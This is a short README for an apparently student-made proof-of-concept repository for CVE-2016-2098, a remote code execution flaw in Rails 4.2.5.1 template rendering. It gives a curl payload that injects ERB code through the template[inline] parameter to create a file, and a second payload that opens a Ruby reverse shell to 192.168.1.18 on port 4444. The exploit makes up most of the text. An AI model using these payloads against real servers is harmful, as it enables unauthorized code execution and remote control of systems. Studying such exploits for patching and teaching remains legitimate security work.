/rails-PoC-CVE-2016-2098

Proof of concept CVE-2016-2098

Primary LanguageRuby

A Proof of Concept of vulnerability: CVE-2016-2098

University project created by @alejandro-marting where we can check the vulnerability 2096

Using:

  • rails 4.2.5.1
  • view has a vulnerable code app/views/poc/render1.html.erb

![] (https://github.com/Alejandro-MartinG/rails-PoC-CVE-2016-2098/blob/master/app/assets/images/Captura%20de%20pantalla%20de%202017-01-15%2009:50:23.png)

##Execution: In first place we need run the rails server with the following command:

$ rvmsudo rails server -b 0.0.0.0 -p 80

Now we can cause the remote code execution with the next command:

$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'

(A rooted file should be generate)

If you want try a reverse shell with ruby code inyection, you can run the next command:

$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}'  http://localhost:3000/poc/render1

If you have any question contact with me please!